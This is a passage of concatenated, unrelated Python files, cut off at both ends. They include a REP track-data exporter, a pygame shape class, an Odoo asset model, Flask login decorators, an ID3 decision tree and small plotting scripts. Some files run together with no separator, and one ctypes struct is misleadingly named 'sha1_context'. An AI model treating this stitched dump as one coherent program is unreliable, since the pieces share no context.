        return cache[comment_type_id]
    comment_type = (
        self.session.query(self.db_classes.CommentType)
        .filter(self.db_classes.CommentType.comment_type_id == comment_type_id)
        .first()
    )
    if comment_type is None:
        raise Exception(
            "No Comment Type found with Comment type id: {}".format(
                comment_type_id
            )
        )
    cache[comment_type_id] = comment_type.name
    return comment_type.name
def get_cached_sensor_name(self, sensor_id):
    """Return the sensor name for *sensor_id*, caching database lookups.

    :raises Exception: if no sensor with that id exists.
    """
    cache = self._sensor_dict_on_sensor_id
    if sensor_id in cache:
        return cache[sensor_id]
    sensor = (
        self.session.query(self.db_classes.Sensor)
        .filter(self.db_classes.Sensor.sensor_id == sensor_id)
        .first()
    )
    if sensor is None:
        raise Exception("No sensor found with sensor id: {}".format(sensor_id))
    cache[sensor_id] = sensor.name
    return sensor.name
def get_cached_platform_name(self, sensor_id=None, platform_id=None):
    """Return the platform name for either *sensor_id* or *platform_id*.

    If the name is not cached, it is loaded from the data store (resolving
    the sensor's host platform first when only a sensor id is given) and
    added to the cache.

    :raises Exception: if neither id is given, or no matching sensor or
        platform exists.
    """
    # invalid parameter handling
    if sensor_id is None and platform_id is None:
        raise Exception(
            'either "sensor_id" or "platform_id" has to be provided to get "platform name"'
        )
    if sensor_id:
        # return from cache
        if sensor_id in self._platform_dict_on_sensor_id:
            return self._platform_dict_on_sensor_id[sensor_id]
        sensor = (
            self.session.query(self.db_classes.Sensor)
            .filter(self.db_classes.Sensor.sensor_id == sensor_id)
            .first()
        )
        if sensor:
            # Resolve the owning platform of this sensor.
            platform_id = sensor.host
        else:
            raise Exception("No sensor found with sensor id: {}".format(sensor_id))
    if platform_id:
        # return from cache
        if platform_id in self._platform_dict_on_platform_id:
            return self._platform_dict_on_platform_id[platform_id]
        # BUGFIX: this previously queried the Sensor table filtered by
        # sensor_id, so lookups made with only a platform_id (sensor_id is
        # None here) could never find the platform and either raised or
        # cached a sensor's name as a platform name. Query Platform by
        # platform_id, as the exception message below always intended.
        platform = (
            self.session.query(self.db_classes.Platform)
            .filter(self.db_classes.Platform.platform_id == platform_id)
            .first()
        )
        if platform:
            self._platform_dict_on_platform_id[platform_id] = platform.name
            if sensor_id:
                self._platform_dict_on_sensor_id[sensor_id] = platform.name
        else:
            raise Exception(
                "No Platform found with platform id: {}".format(platform_id)
            )
        return platform.name
def export_datafile(self, datafile_id, datafile):
    """Export all states, contacts and comments of a datafile to
    "<datafile>.rep" in REP format.

    :param datafile_id: ID of Datafile
    :type datafile_id: String
    :param datafile: Base name of the output .rep file
    """
    states = (
        self.session.query(self.db_classes.State)
        .filter(self.db_classes.State.source_id == datafile_id)
        .all()
    )
    contacts = (
        self.session.query(self.db_classes.Contact)
        .filter(self.db_classes.Contact.source_id == datafile_id)
        .all()
    )
    comments = (
        self.session.query(self.db_classes.Comment)
        .filter(self.db_classes.Comment.source_id == datafile_id)
        .all()
    )
    # Context manager ensures the handle is closed even if a lookup or
    # formatting step raises part-way through (the original leaked it).
    with open("{}.rep".format(datafile), "w+") as f:
        # Export states.
        for state in states:
            # Load platform name from cache; fall back to a placeholder.
            try:
                platform_name = self.get_cached_platform_name(
                    sensor_id=state.sensor_id
                )
            except Exception as ex:
                print(str(ex))
                platform_name = "[Not Found]"
            # Depth column: negated elevation, NaN when unknown.
            if state.elevation is None:
                depthStr = "NaN"
            elif state.elevation == 0.0:
                depthStr = "0.0"
            else:
                # BUGFIX: must be a string -- the bare float previously made
                # " ".join() below raise TypeError for non-zero elevations.
                depthStr = str(-1 * state.elevation.magnitude)
            state_rep_line = [
                transformer.format_datatime(state.time),
                '"' + platform_name + '"',
                "AA",
                transformer.format_point(
                    state.location.longitude, state.location.latitude
                ),
                str(unit_converter.convert_radian_to_degree(state.heading))
                if state.heading
                else "0",
                str(unit_converter.convert_mps_to_knot(state.speed))
                if state.speed
                else "0",
                depthStr,
            ]
            f.write(" ".join(state_rep_line) + "\r\n")
        # Export contacts.
        for contact in contacts:
            # Load platform/sensor names from cache; keep placeholders on error.
            platform_name = "[Not Found]"
            sensor_name = "[Not Found]"
            try:
                platform_name = self.get_cached_platform_name(
                    sensor_id=contact.sensor_id
                )
                sensor_name = self.get_cached_sensor_name(
                    sensor_id=contact.sensor_id
                )
            except Exception as ex:
                print(str(ex))
            # WKB hex conversion to a shapely "point".
            point = None
            if contact.location is not None:
                point = wkb.loads(contact.location.desc, hex=True)
            contact_rep_line = [
                transformer.format_datatime(contact.time),
                platform_name,
                "@@",
                transformer.format_point(point.y, point.x) if point else "NULL",
                str(math.degrees(contact.bearing)) if contact.bearing else "NULL",
                "NULL",  # unit_converter.convert_meter_to_yard(contact.range) if contact.range else "NULL",
                sensor_name,
                "N/A",
            ]
            ambigous_bearing = None  # TODO: ambigous bearing.
            # SENSOR2 lines carry the extra ambiguous-bearing/frequency columns.
            if ambigous_bearing or contact.freq:
                contact_rep_line.insert(0, ";SENSOR2:")
                contact_rep_line.insert(
                    6, str(ambigous_bearing) if ambigous_bearing else "NULL",
                )
                contact_rep_line.insert(
                    7, str(contact.freq) if contact.freq else "NULL",
                )
            else:
                contact_rep_line.insert(0, ";SENSOR:")
            # (leftover debug prints of the assembled line were removed)
            f.write(" ".join(contact_rep_line) + "\r\n")
        # Export comments.
        for comment in comments:
            vessel_name = self.get_cached_platform_name(
                platform_id=comment.platform_id
            )
            message = comment.content
            comment_type_name = self.get_cached_comment_type_name(
                comment.comment_type_id
            )
            comment_rep_line = [
                transformer.format_datatime(comment.time),
                vessel_name,
                comment_type_name,
                message,
            ]
            if comment_type_name == "None":
                comment_rep_line.insert(0, ";NARRATIVE:")
                # Plain narratives omit the type column.
                del comment_rep_line[3]
            else:
                comment_rep_line.insert(0, ";NARRATIVE2:")
            f.write(" ".join(comment_rep_line) + "\r\n")
|
# @Author : Shusheng Wang
# @Time : 2021/2/2 6:17 下午
# @Email : lastshusheng@163.com
from enum import Enum
class ErrorCode(Enum):
    """Service result codes."""
    # Request parameters were invalid.
    ParamsError = -3
    # Operation completed successfully.
    Success = 0
class ErrorCodeHelper:
    """Translates ErrorCode values into human-readable messages."""

    # Lookup table mapping each known error code to its message.
    _MESSAGES = {
        ErrorCode.ParamsError: "参数错误",
        ErrorCode.Success: "成功",
    }

    @classmethod
    def transform_error_msg(cls, err_code):
        """Return the message for *err_code*, or "" for unknown codes."""
        return cls._MESSAGES.get(err_code, "")
|
import pygame
from ..._gid import Gid
from ..._gevent import GEvent
from ..._color import Color
from ..._move import Move
from ._collision_box import CollisionBox
class Shape(Gid):
    """Shape represents a collection of cells to be displayed in a grid board.

    (gridx, gridy) is the shape origin in grid coordinates, (xcells, ycells)
    its size in cells, and (xsize, ysize) the pixel size of a single cell.
    """
    def __init__(self, name, x, y, xcells, ycells, xsize, ysize, cells=None, **kwargs):
        super(Shape, self).__init__()
        self.name = name
        self.gridx = x
        self.gridy = y
        self.xcells = xcells
        self.ycells = ycells
        self.xsize = xsize
        self.ysize = ysize
        # Pixel extent of the whole shape.
        self.dx = xcells * xsize
        self.dy = ycells * ysize
        self.cells = cells if cells else []
        self.move = kwargs.get("move", Move())
        self.pushed = kwargs.get("pushed", None)
        self.color = kwargs.get("color", Color.BLACK)
        self.gravity = kwargs.get("gravity", True)
        # Rotation is only allowed for square shapes.
        self.allow_rotation = (
            kwargs.get("rotation", True) if (self.xcells == self.ycells) else False
        )
        self.allow_key_handle = kwargs.get("hkey", False)
        self.transient = kwargs.get("transient", False)
        # True once gravity has been applied in the current tick.
        self.gravity_step = False
        # True while the most recent movement was a rotation (see back_it()).
        self.is_rotation = False
        self.dx_move = xsize
        self.dy_move = ysize
        # Deferred movement callbacks collected during a tick.
        self.move_actions = []
        # Re-base the given cells from shape-relative to board coordinates
        # and share the shape's move object with them.
        for cell in self.cells:
            cell.incr_xy(self.gridx, self.gridy)
            cell.move = self.move
    def __str__(self):
        return f"[{self.gid}] : {self.__class__.__name__}@{self.name} | {self.gridx} {self.gridy} {self.cells}"
    def add_cell(self, cell):
        """add_cell adds a new cell to the shape, re-based to board coordinates.
        """
        cell.incr_xy(self.gridx, self.gridy)
        cell.move = self.move
        self.cells.append(cell)
    def del_cell(self, cell):
        """del_cell deletes a cell from the shape (no-op if not present).
        """
        if cell in self.cells:
            self.cells.remove(cell)
    def move_it(self, dx, dy, update=True):
        """move_it moves a shape the given X and Y offsets. Grid position
        and graphical position are stored and move delta is stored. It moreover
        updates gridx and gridy attributes if update flag is True.
        """
        self.is_rotation = False
        if update:
            self.gridx += dx
            self.gridy += dy
        for cell in self.cells:
            cell.move_it(dx, dy)
    def back_it(self):
        """back_it moves back all cells in the shape move. It is basically the
        reverse operation for move_it().
        """
        result = []
        for cell in self.cells:
            result.append(cell.back_it())
        # Rotation does not update grid position, so they should not be changed
        # back now.
        if not self.is_rotation:
            # NOTE(review): uses the last cell's undo delta as the shape's
            # delta -- assumes all cells moved by the same offset; confirm.
            backx, backy = result[-1]
            self.gridx -= backx
            self.gridy -= backy
        return result
    def rotate_clockwise(self):
        """rotate_clockwise rotates the shape by 90 degrees clockwise.
        """
        if not self.allow_rotation:
            return
        self.is_rotation = True
        for cell in self.cells:
            # Relative position of the cell inside the shape.
            gridx = cell.gridx - self.gridx
            gridy = cell.gridy - self.gridy
            # Delta mapping relative (gx, gy) -> (n-1-gy, gx) for an n x n shape.
            deltax = self.xcells - 1 - gridy - gridx
            deltay = gridx - gridy
            cell.move_it(deltax, deltay)
    def rotate_anticlockwise(self):
        """rotate_anticlockwise rotates the shape by 90 degrees anti-clockwise.
        """
        if not self.allow_rotation:
            return
        self.is_rotation = True
        for cell in self.cells:
            # Relative position of the cell inside the shape.
            gridx = cell.gridx - self.gridx
            gridy = cell.gridy - self.gridy
            # Delta mapping relative (gx, gy) -> (gy, n-1-gx) for an n x n shape.
            deltay = self.xcells - 1 - gridx - gridy
            deltax = gridy - gridx
            cell.move_it(deltax, deltay)
    def start_tick(self):
        """start_tick should set all elements ready for a new tick.
        """
        # Discard movement callbacks queued during the previous tick.
        self.move_actions = []
    def end_tick(self):
        """end_tick should set all elements ready for the end of a tick. Any
        structure to be cleaned up can be done at this point.
        """
        pass
    def handle_keyboard_event(self, event):
        """handle_keyboard_event should process the keyboard event given.
        Arrow keys move the shape one cell; space rotates it clockwise.
        """
        if not self.allow_key_handle:
            return
        self.gravity_step = False
        if event.key == pygame.K_LEFT:
            self.move_it(-1, 0)
        if event.key == pygame.K_RIGHT:
            self.move_it(1, 0)
        if event.key == pygame.K_UP:
            self.move_it(0, -1)
        if event.key == pygame.K_DOWN:
            self.move_it(0, 1)
        if event.key == pygame.K_SPACE:
            self.rotate_clockwise()
    def handle_mouse_event(self, event):
        """handle_mouse_event should process the mouse event given.
        Mouse events are passed to the active scene to be handled.
        """
        pass
    def gravity_move(self, steps):
        """gravity_move represents a gravity movement down the board for the
        given number of steps. This movement can be called only one time for
        every tick.
        """
        if not self.gravity_step:
            self.gravity_step = True
            # Deferred: the actual move_it(0, steps) runs when move_actions
            # are executed, not immediately.
            self.move_actions.append({"call": self.move_it, "args": (0, steps)})
    def handle_custom_event(self, event):
        """handle_custom_event should process pygame custom event given.
        Any object in the game, like, scene, graphic objects, ... can post
        customs events, and those should be handled at this time.
        """
        if self.gravity and event.type == GEvent.T_GRAVITY:
            self.gravity_move(1)
    def get_collision_box(self):
        """get_collision_box retrieves collision box for all cells contained
        in the shape.
        """
        collision_box = CollisionBox()
        for cell in self.cells:
            collision_box.update(cell.get_collision_box())
        return collision_box
    def out_of_bounds_x_response(self):
        """out_of_bounds_x_response takes action when the graphical object is
        out of bound at the X-axis.
        Return True if objects is lost out of bound or False if object should
        be in bounds.
        """
        return self.out_of_bounds_response()
    def out_of_bounds_y_response(self):
        """out_of_bounds_y_response takes action when the graphical object is
        out of bound at the Y-axis.
        Return True if objects is lost out of bound or False if object should
        be in bounds.
        """
        return self.out_of_bounds_response()
    def out_of_bounds_response(self):
        """out_of_bounds_response takes action when the graphical object is
        out of bound at the X-axis or Y-axis: all cells are moved back.
        NOTE(review): implicitly returns None (falsy), i.e. "object should be
        in bounds" -- confirm that is the intended contract.
        """
        for cell in self.cells:
            cell.back_it()
    def collide_with(self, other, collision):
        """collide_with processes a collision with other object by moving all
        cells back to their previous position.
        """
        for cell in self.cells:
            cell.back_it()
    def update(self, surface, **kwargs):
        """update provides any functionality to be done every tick.
        """
        for cell in self.cells:
            cell.update(surface, **kwargs)
    def render(self, surface, **kwargs):
        """render should draw the instance on the given surface.
        """
        # New frame: gravity may be applied again.
        self.gravity_step = False
        for cell in self.cells:
            cell.render(surface, **kwargs)
|
from batch_main import get_readings_by_date, build_csv, run
from test.fixtures import BaseTest
from run import run as main_run
import datetime
class TestBatch(BaseTest):
    """Test the batch functionality."""
    def setUp(self):
        """Setup the sensors and run the sensors."""
        super().setUp()
        # Generate readings for both fixture sensors, dated today (UTC).
        main_run(self.sensor1.id, self.sensor2.id)
        self.cob_date = datetime.datetime.utcnow().date()
    def test_get_readings(self):
        """Readings for today's COB date exist and are ordered newest-first."""
        readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
        self.assertEqual(6, len(readings))
        # Newest first: the first reading was created after the last.
        self.assertTrue(readings[0].created_date > readings[5].created_date)
        # A date with no data yields an empty result.
        readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=datetime.date(1970, 1, 1))
        self.assertEqual(0, len(readings))
    def test_build_csv(self):
        """The CSV contains one line per reading plus a header (6 + 1 = 7)."""
        readings = get_readings_by_date(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
        self.assertEqual(7, len(build_csv(readings).getvalue().splitlines()))
    def test_send_email(self):
        """Smoke test: the end-to-end batch run should not raise."""
        run(self.sensor1.id, self.sensor2.id, cob_date=self.cob_date)
|
# This file is part of Adblock Plus <https://adblockplus.org/>,
# Copyright (C) 2006-present eyeo GmbH
#
# Adblock Plus is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# Adblock Plus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Adblock Plus. If not, see <http://www.gnu.org/licenses/>.
#
#Setup script adapted to work with our new plugin flake8-Smart.
#
from __future__ import print_function
import os
import glob
import tokenize
import sys
import re
import subprocess
from setuptools import setup, Command
class TestCommand(Command):
    """setuptools command that checks the flake8 plugin against its test corpus.
    Each file under tests/ declares the errors it expects with comments of the
    form '# A123' (an optional '*' in the comment marks the expected column);
    the command diffs those expectations against what flake8 actually reports.
    """
    user_options = []
    def _get_expected_errors(self, filename):
        """Collect (line, column, code) triples declared in comments of *filename*."""
        errors = set()
        def tokeneater(kind, token, start, end, line):
            if kind == tokenize.COMMENT:
                match = re.search(r'^#+[*\s]*(A\d+)', token)
                if match:
                    try:
                        # A '*' in the comment points at the expected column.
                        offset = token.index('*')
                    except ValueError:
                        offset = 0
                    # The expected error is recorded for the line AFTER the
                    # comment (start[0] + 1).
                    errors.add((start[0] + 1,
                                start[1] + 1 + offset,
                                match.group(1)))
        with open(filename, 'rb') as file:
            # tokenize has incompatible APIs on Python 2 and 3.
            if sys.version_info[0] >= 3:
                for token in tokenize.tokenize(file.readline):
                    tokeneater(*token)
            else:
                tokenize.tokenize(file.readline, tokeneater)
        return errors
    def _get_reported_errors(self, filename):
        """Run flake8 on *filename* and parse (line, column, code) from its output."""
        output = subprocess.Popen(['flake8', filename],
                                  stdout=subprocess.PIPE).communicate()[0]
        errors = set()
        for line in output.decode('utf-8').splitlines():
            # Format: path:line:col: CODE message
            _, lineno, colno, error = line.split(':', 3)
            errors.add((int(lineno), int(colno), error.split()[0]))
        return errors
    def initialize_options(self):
        # Required by the Command interface; nothing to set up.
        pass
    def finalize_options(self):
        # Required by the Command interface; nothing to finalize.
        pass
    def run(self):
        """Compare expected vs reported errors per test file; exit 1 on mismatch."""
        directory = os.path.dirname(__file__)
        filenames = glob.glob(os.path.join(directory, 'tests', '*.py'))
        failed = False
        for filename in sorted(filenames):
            expected = self._get_expected_errors(filename)
            reported = self._get_reported_errors(filename)
            # Symmetric difference: errors that are missing OR unexpected.
            failures = expected ^ reported
            if not failures:
                print(filename + ': OK')
                continue
            for record in sorted(failures):
                lineno, colno, error = record
                print('{}:{}:{}: '.format(filename, lineno, colno), end='')
                if record in expected:
                    print(error + ' expected')
                else:
                    print('unexpected ' + error)
            failed = True
        if failed:
            sys.exit(1)
# Register the plugin's checks as flake8 extension entry points and wire in
# the custom `python setup.py test` command defined above.
setup(
    name='flake8-Smart',
    version='0.1',
    py_modules=['flake8_Smart'],
    install_requires=['flake8>=3.2.1'],
    entry_points={
        'flake8.extension': [
            'A = flake8_Smart:check_ast',
            'A1 = flake8_Smart:check_quotes',
            'A111 = flake8_Smart:check_redundant_parenthesis',
            'A303 = flake8_Smart:check_non_default_encoding'
        ],
    },
    cmdclass={'test': TestCommand}
)
|
from ctypes import *
class __sha1_context(Structure):
    # NOTE(review): despite the name, these fields describe a styled text run
    # (character range, font, style, color), not SHA-1 hash state -- confirm
    # the intended purpose and consider renaming.
    _fields_=[
        ("startCharOffset", c_uint16),  # first character covered
        ("endCharOffset", c_uint16),    # last character covered -- TODO confirm inclusive/exclusive
        ("fontID", c_uint16),
        ("style_flags", c_char),
        ("font_size", c_char),
        ("text_color", c_int)
    ]
import random
from itertools import count
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
plt.style.use('fivethirtyeight')
# NOTE(review): x_vals/y_vals/index are leftovers from an earlier random-walk
# prototype of animate() (removed); the current animate() below reads
# data.csv instead and never touches these.
x_vals = []
y_vals = []
index = count()
def animate(i):
    """FuncAnimation callback: re-read data.csv and redraw both channels.

    Clears and re-plots the axes on every frame; the plot/axhline order
    determines series colors and legend order, so it is left unchanged.

    :param i: frame index supplied by FuncAnimation (unused here).
    """
    data = pd.read_csv('data.csv')
    x = data['x_value']
    y1 = data['total_1']
    y2 = data['total_2']
    median1 = y1.median()
    median2 = y2.median()
    # Clear current axes so lines are not drawn on top of stale ones.
    plt.cla()
    plt.plot(x, y1, label = "Channel 1")
    plt.plot(x, y2, label = "Channel 2")
    plt.axhline(median1, color = "#000000", label = "Channel 1 median")
    plt.axhline(median2, color = "#111111", label = "Channel 2 median")
    plt.legend(loc = "upper right") #location for constant location
    plt.tight_layout()
# Keep a reference to the animation: FuncAnimation stops (is garbage
# collected) if it is not bound to a name. Redraw every 1000 ms.
ani = FuncAnimation(plt.gcf(), animate, interval = 1000)
plt.show()
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
import time
import logging
_logger = logging.getLogger(__name__)
import datetime
class Asset(models.Model):
    """Extension of account.asset.asset with procurement, certificate,
    IT-hardware, vehicle and land/building metadata, plus a scheduled
    tax due-date reminder."""
    _name = 'account.asset.asset'
    _inherit = ['account.asset.asset', 'mail.thread']
    # Procurement method of the asset.
    pengadaan = fields.Selection(
        selection=[
            ('PO', 'PO'),
            ('Pembelian Langsung', 'Pembelian Langsung')],
        string='Metode Pengadaan',
        required=True)  # was required="true": a truthy string; True is the proper value
    sertifikat = fields.Selection(
        selection=[
            ('SHM', 'SHM'),
            ('HGB', 'HGB')],
        string='Jenis Sertifikat')
    processor = fields.Char(
        string='Processor',
        size=50,
        required=False)
    harddisk = fields.Char(
        string='Harddisk')
    memory = fields.Char(
        string='Memory')
    budget = fields.Char(
        string='Budget')
    kd_wilayah = fields.Char(
        string='Kode Wilayah')
    no_polisi = fields.Char(
        string='No. Polisi')
    tgl_pajak = fields.Date(
        string='Tanggal Pajak dan STNK',
        default=lambda *a: time.strftime("%Y-%m-%d"))
    tgl_asuransi = fields.Date(
        default=lambda *a: time.strftime("%Y-%m-%d"),
        string='Tanggal Asuransi')
    tanah = fields.Integer(
        string='Luas Tanah')
    bangunan = fields.Integer(
        string='Luas Bangunan')
    no_sertifikat = fields.Char(
        string='Nomor Sertifikat')
    tgl_sertifikat = fields.Date(
        default=lambda *a: time.strftime("%Y-%m-%d"),
        string='Tanggal Sertifikat')
    alamat = fields.Text(
        string='Alamat')
    tgl_jt_pajak = fields.Date(
        string='Tanggal Jatuh Tempo Pajak',
        default=lambda *a: time.strftime("%Y-%m-%d"))
    tgl_jt_asuransi = fields.Date(
        string='Tanggal Jatuh Tempo Asuransi',
        default=lambda *a: time.strftime("%Y-%m-%d"))
    def cek_jatuh_tempo(self):
        """Post a reminder on every asset whose tax due date is 10 days away.

        BUGFIX: this method was defined twice; the first (raw-SQL) copy was
        dead code silently shadowed by the second, and both referenced the
        misspelled field name 'tgl_jp_pajak' -- the model defines
        'tgl_jt_pajak', so the search always crashed. The dead copy is
        removed and the field name corrected.
        """
        _logger.info('proses cek jatuh tempo.....')
        # due date = today + 10 days
        date_jt = datetime.datetime.now() + datetime.timedelta(days=10)
        # NOTE(review): comparing a Date field against a datetime relies on
        # ORM coercion; consider date_jt.strftime("%Y-%m-%d") -- confirm.
        assets = self.env['account.asset.asset'].search(
            [('tgl_jt_pajak', '=', date_jt)])
        for asset in assets:
            asset.message_post(body="Asset ini akan jatuh tempo 10 hari lagi",
                               message_type='comment',
                               subtype='mail.mt_comment')
from django import forms
from . import models
class PalavraForm(forms.ModelForm):
    """Model form exposing only the 'palavra' field of the Palavra model."""
    class Meta:
        model = models.Palavra
        fields = ['palavra']
        # Human-readable label shown on the rendered form field.
        labels = {
            'palavra': 'Palavra',
        }
# Importing all needed Flask classes
from flask import Flask, session, flash, redirect, url_for
# Importing wraps
from functools import wraps
# Creating logged in required function
def login_required(f):
    """Decorator: allow the view only when an account is in the session.

    Unauthenticated visitors get a flash message and are redirected to the
    user login page.
    """
    @wraps(f)
    def wrap(*args, **kwargs):
        # Guard clause: no logged-in account -> flash and redirect.
        if 'account' not in session:
            flash("You need to login first")
            return redirect(url_for('users.login'))
        return f(*args, **kwargs)
    return wrap
# Creating logged in required function
def login_required_early(f):
    """Decorator: allow the view only when an account is in the session.

    Unauthenticated visitors get a flash message and are redirected to the
    admin login page.
    """
    @wraps(f)
    def wrap(*args, **kwargs):
        # Guard clause: no logged-in account -> flash and redirect.
        if 'account' not in session:
            flash("You need to login first")
            return redirect(url_for('admin.login'))
        return f(*args, **kwargs)
    return wrap
import csv
import matplotlib.pyplot as plt
from datetime import datetime

# Plot annual rainfall totals for each Chennai reservoir, then the grand total.
filename = 'chennai_reservoir_rainfall.csv'
# Reservoir names in the CSV column order (columns 1..4; column 0 is the date).
RESERVOIRS = ['POONDI', 'CHOLAVARAM', 'REDHILLS', 'CHEMBARAMBAKKAM']
Date = []
daily = {name: [] for name in RESERVOIRS}
with open(filename, 'r') as csvfile:
    csvreader = csv.reader(csvfile)
    fields = next(csvreader)  # header row
    for row in csvreader:
        for val in row:
            if not val:
                print("There is a Null value")
        # Normalise dd-mm-yyyy to ISO yyyy-mm-dd.
        Date.append(datetime.strptime(row[0], '%d-%m-%Y').strftime('%Y-%m-%d'))
        for name, val in zip(RESERVOIRS, row[1:]):
            daily[name].append(float(val))

# Sum the daily readings into calendar-year totals.
annual = {name: [] for name in RESERVOIRS}
cnt = 0
while cnt < len(Date):
    # Crude leap-year test (divisible by 4) -- adequate for this 2004+ dataset.
    span = 366 if int(Date[cnt][:4]) % 4 == 0 else 365
    for name in RESERVOIRS:
        annual[name].append(sum(daily[name][cnt:cnt + span]))
    cnt += span

# X axis: years, assuming the data starts in 2004.
years = [2004 + i for i in range(len(annual[RESERVOIRS[0]]))]

def _plot_annual(values, title, ylabel="mm (unit for measuring rain)"):
    """Render one bar chart of annual totals and show it.

    Replaces four near-identical copy-pasted plotting stanzas; also fixes
    the user-facing typo "Rianfall" -> "Rainfall" in the chart titles.
    """
    plt.bar(years, values)
    plt.locator_params(axis="x", nbins=17)
    plt.xlabel("Year")
    plt.ylabel(ylabel)
    plt.title(title)
    plt.show()

# Rainfall on each reservoir over respective years.
for name in RESERVOIRS:
    _plot_annual(annual[name], "Chennai Reservoir Rainfall for " + name)

# Total rainfall over respective years.
total = [sum(vals) for vals in zip(*(annual[name] for name in RESERVOIRS))]
_plot_annual(total, "Total Rainfall Over Respective Years",
             ylabel="Million Cubic Feet")
|
from numpy import *
from math import log
import operator
######################################################################
#
# 说明:
# 计算信息熵
# 参数:
# datas[in][list]:输入数据集
#
def calc_shannon_ent(datas):
    """Return the Shannon entropy H = -sum(p * log2(p)) of the class labels
    found in the last column of each record of *datas*."""
    # Tally how many records carry each class label.
    counts = {}
    for record in datas:
        counts[record[-1]] = counts.get(record[-1], 0) + 1
    total = float(len(datas))
    entropy = 0.0
    for cnt in counts.values():
        p = cnt / total
        entropy -= p * log(p, 2)
    return entropy
#
# 说明:
# 划分数据集。将数据集datas按照属性feac划分为各个子集
# 参数:
# datas[in][list]:待划分数据集
# feac_index[in]:要划分的属性值索引
# value[in]:本次划分出的子集的feac值
# new_datas[out]:按照feac=value划分出的子集
#
def split_datas(datas, feac_index, value):
    """Return the subset of *datas* whose feature at *feac_index* equals
    *value*, with that feature column removed from each record."""
    return [record[:feac_index] + record[feac_index + 1:]
            for record in datas
            if record[feac_index] == value]
#
# 说明:
# 寻找最佳特征用于划分
#
def choose_best_feac(datas):
    """Return the index of the feature whose split maximises information
    gain over *datas* (ID3 criterion), or -1 if no split has positive gain.
    Ties keep the lowest feature index, matching the original behaviour."""
    best_gain = 0.0
    best_feac = -1
    # Entropy of the unsplit (parent) data set.
    base_ent = calc_shannon_ent(datas)
    for feac in range(len(datas[0]) - 1):
        # Weighted entropy of the child subsets, one per distinct value:
        # sub_ent = sum(subset proportion * subset entropy).
        sub_ent = 0.0
        for value in set(record[feac] for record in datas):
            subset = split_datas(datas, feac, value)
            weight = len(subset) / float(len(datas))
            sub_ent += weight * calc_shannon_ent(subset)
        gain = base_ent - sub_ent
        # Strictly greater, so earlier features win ties.
        if gain > best_gain:
            best_gain = gain
            best_feac = feac
    return best_feac
#
# 说明:
# 返回频率最高的类别。
#
def majority_cnt(classes):
    """Return the most frequent class label in *classes*.

    BUGFIX: the original called dict.iteritems(), which exists only on
    Python 2 and raises AttributeError on Python 3; .items() works on both.
    """
    classes_count = {}
    for key in classes:
        classes_count[key] = classes_count.get(key, 0) + 1
    # Sort labels by descending count; the first entry is the majority label.
    sorted_classes_count = sorted(classes_count.items(), key=operator.itemgetter(1), reverse=True)
    return sorted_classes_count[0][0]
#
# 说明:
# 创建决策树
# 参数:
# datas[in][list]:数据样本集
# feac_descs[in][list]:特征名称,仅用于标注
# tree[out][map]:返回的决策树,各节点保存为[map]类型
#
def create_tree(datas, feac_descs):
    """Recursively build an ID3 decision tree.

    :param datas: data sample set; the last column of each record is the label
    :param feac_descs: feature display names; NOTE: mutated -- the chosen
        feature's name is deleted at each level (original behaviour kept)
    :return: nested dict tree, or a plain class label at the leaves
    """
    labels = [record[-1] for record in datas]
    # Leaf: every sample belongs to the same class.
    if labels.count(labels[0]) == len(labels):
        return labels[0]
    # Leaf: no features left to split on -> majority class wins.
    if len(datas[0]) == 1:
        return majority_cnt(labels)
    # Split on the feature with the highest information gain.
    best = choose_best_feac(datas)
    best_desc = feac_descs[best]
    del feac_descs[best]
    # One branch per distinct value of the chosen feature; each branch gets
    # its own copy of the remaining feature names.
    branches = {}
    for value in set(record[best] for record in datas):
        branches[value] = create_tree(split_datas(datas, best, value), feac_descs[:])
    return {best_desc: branches}
if __name__ == '__main__':
    # Build and print a decision tree from the contact-lenses sample data.
    # BUGFIX: the file handle was never closed; a context manager fixes that.
    with open("lenses.txt") as fr:
        lenses = [inst.strip().split('\t') for inst in fr.readlines()]
    descs = ["age", "prescript", "astigmatic", "tearRate"]
    tree = create_tree(lenses, descs)
    print(tree)
|
import csv
from clasemanejadorpersona import manejadorpersona
from clasemanejadortaller import manejadortaller
from clasemanejadorinscrip import manejadorins
def menu():
    """Print the numbered option menu on stdout."""
    options = (
        '1 - añadir persona',
        '2 - buscar dni y mostrar taller y lo que adeuda',
        '3 - buscar id taller listar persona',
        '4 - ingresar dni y dar de alta',
        '5 - crear archivo de inscripciones',
    )
    for option in options:
        print(option)
if __name__ == '__main__':
    # Instantiate the three managers.
    # NOTE(review): manejatalleres is created but never used below --
    # presumably manejadorins loads taller data itself; confirm.
    manejatalleres = manejadortaller()
    manejapersona = manejadorpersona()
    manejain = manejadorins()
    band = True
    # Menu loop: any input other than options 1-5 ends the program.
    while band == True:
        print('ingresar opcion')
        menu()
        op = input()
        if op == '1':
            manejapersona.añadir(manejain)
        elif op == '2':
            manejain.buscar()
        elif op == '3':
            manejain.mostrartaller()
        elif op == '4':
            manejain.alta()
        elif op == '5':
            manejain.escribir()
        else:
            band = False
    print('termino programa')
|
# -*- coding: utf-8 -*-
def cubes_with_x_digits(x):
    """Yield, in increasing order, every perfect cube with exactly x digits.

    BUGFIX: the original derived the start index from a float cube root,
    which could start too low (e.g. for x=4, 1000**(1/3) evaluates to
    9.999... so floor() gave 9 and 729 -- a 3-digit cube -- was yielded).
    Cubes are now filtered exactly against the [10**(x-1), 10**x) range.
    """
    from math import floor
    lo = 10 ** (x - 1)
    hi = 10 ** x
    # Start one below the float estimate to be safe against rounding error.
    i = max(1, floor(lo ** (1. / 3)) - 1)
    while True:
        c = i ** 3
        if c >= hi:
            return
        if c >= lo:
            yield c
        i += 1
def sort_digits(n):
    """Return the digits of *n* sorted ascending, as a string signature."""
    return ''.join(sorted(str(n)))
digits = 3
while True:
    # All cubes with this many digits and their sorted-digit signatures.
    cubes = [x for x in cubes_with_x_digits(digits)]
    cube_repr = [sort_digits(x) for x in cubes]
    # Flag cubes whose signature occurs at least five times, i.e. families
